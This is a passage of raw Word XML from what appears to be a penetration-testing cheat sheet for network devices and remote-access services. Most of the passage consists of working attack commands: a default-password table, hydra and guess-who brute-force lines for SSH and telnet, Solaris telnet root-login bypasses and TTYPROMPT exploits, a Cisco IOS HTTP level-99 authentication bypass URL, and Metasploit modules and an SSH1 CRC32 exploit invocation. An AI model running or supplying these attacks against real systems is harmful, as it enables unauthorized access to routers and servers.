          <w:p w:rsidR="00956636" w:rsidRPr="00956636" w:rsidRDefault="00956636" w:rsidP="00417FC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">security  manager  user </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956636" w:rsidRPr="00956636" w:rsidTr="00956636">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956636" w:rsidRPr="00AD67C4" w:rsidRDefault="00956636" w:rsidP="00AD67C4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="91"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD67C4">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>D-link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7858" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956636" w:rsidRPr="00956636" w:rsidRDefault="00956636" w:rsidP="00417FC1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>private  admin  user  year2000  d-link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00956636" w:rsidRPr="00956636" w:rsidRDefault="00956636" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00417FC1" w:rsidRDefault="00417FC1" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956636">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force attacks against password (and using default user names if tacacs/radius is enabled) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55DF7" w:rsidRDefault="00A55DF7" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B90047" w:rsidRPr="00D04166" w:rsidRDefault="00B90047" w:rsidP="00B90047">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hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P passwords.txt -s 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;host/ip&gt; cisco</w:t>
      </w:r>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90047" w:rsidRPr="00D04166" w:rsidRDefault="00B90047" w:rsidP="00B90047">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hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L users.txt -P passwords.txt -s 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;host/ip&gt; telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A55DF7" w:rsidRDefault="00A55DF7" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803E3B" w:rsidRDefault="00803E3B" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Specific Telnet Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRDefault="00111CEE" w:rsidP="00CB2CC0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB2CC0" w:rsidRPr="00B90047" w:rsidRDefault="00CB2CC0" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sun Solaris 10 (sparc + x86) Telnet Remote Authentication Bypass Vulnerability (-froot)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2CC0" w:rsidRPr="00CB2CC0"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-l-froot &lt;hostname&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>root is allowed via telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2CC0" w:rsidRPr="00CB2CC0"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–l-fbin &lt;hostname&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>root is not allowed via telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803E3B"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-l-d/dev/console &lt;hostname&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2CC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>bypass console only root login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRDefault="00111CEE" w:rsidP="00B90047">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRPr="00CB2CC0" w:rsidRDefault="00111CEE" w:rsidP="00B90047">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00111CEE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>solaris/telnet/fuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803E3B" w:rsidRDefault="00803E3B" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF655D" w:rsidRPr="00B90047" w:rsidRDefault="00111CEE" w:rsidP="00B90047">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90047">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solaris (&lt;=8 sparc + x86) TTYPROMPT Telnet Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRPr="00111CEE" w:rsidRDefault="00111CEE" w:rsidP="00B90047">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111CEE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>raptor_rlogin –h &lt;IPaddress&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRPr="00111CEE" w:rsidRDefault="00111CEE" w:rsidP="00B90047">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRPr="00111CEE" w:rsidRDefault="00111CEE" w:rsidP="00B90047">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111CEE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>metaploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111CEE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (solaris/telnet/ttyprompt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111CEE" w:rsidRPr="00111CEE" w:rsidRDefault="00111CEE" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>Web based protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00417FC1" w:rsidRPr="00C21C9C" w:rsidRDefault="00417FC1" w:rsidP="00417FC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Clear text for HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00803E3B" w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (wireshark or Cain to sniff and capture)</w:t>
      </w:r>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Default passwords</w:t>
      </w:r>
      <w:r w:rsidR="00623A04" w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00803E3B" w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>see default password list.</w:t>
      </w:r>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Brute force attacks against password wi</w:t>
      </w:r>
      <w:r w:rsidR="00803E3B" w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>th default user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803E3B" w:rsidRPr="00C21C9C" w:rsidRDefault="00803E3B" w:rsidP="0082714B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0082714B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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Cisco HTTP Configuration Arbitrary Administrative Access Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D4126" w:rsidRPr="007D4126" w:rsidRDefault="00417FC1" w:rsidP="007D4126">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="007D4126" w:rsidRPr="007D4126">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.g. </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="007D4126">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>http://10.0.1.252/level/99/exec/show/config</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1DBE" w:rsidRDefault="005B1DBE" w:rsidP="007D4126">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="007D412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perl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> cge &lt;target&gt; 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA703A" w:rsidRDefault="00AA703A" w:rsidP="007D4126">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00417FC1" w:rsidRPr="00A236AF" w:rsidRDefault="007D4126" w:rsidP="00A236AF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D4126">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (aux - admin/cisco/ios_http_auth_bypass) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C14E10" w:rsidRDefault="00B50C46" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50C46">
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50C46">
        <w:tab/>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21C9C" w:rsidRDefault="00C21C9C" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fingerprint SSH service:</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telnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ipaddress&gt; 22</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ncat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ipaddress&gt; 22</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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C21C9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ipaddress&gt; 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C21C9C" w:rsidRDefault="00C21C9C" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C21C9C" w:rsidRDefault="00A1363A" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bruteforce attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1363A" w:rsidRPr="00D04166" w:rsidRDefault="009137C2" w:rsidP="00D04166">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hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L users.txt -P passwords.txt -s 22 </w:t>
      </w:r>
      <w:r w:rsidR="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;host/ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009137C2" w:rsidRPr="00D04166" w:rsidRDefault="00D04166" w:rsidP="00D04166">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guess-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">who –l &lt;user&gt; -h &lt;host&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 22 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D04166">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-1 &lt; password.lst </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1363A" w:rsidRDefault="00A1363A" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D04166" w:rsidRDefault="002B1290" w:rsidP="00C21C9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH1 CRC32 compensation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D04166">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D04166">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D04166" w:rsidRPr="002B1290" w:rsidRDefault="00D04166" w:rsidP="002B1290">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>./cm-ssh/shack –t0</w:t>
      </w:r>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002B1290">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
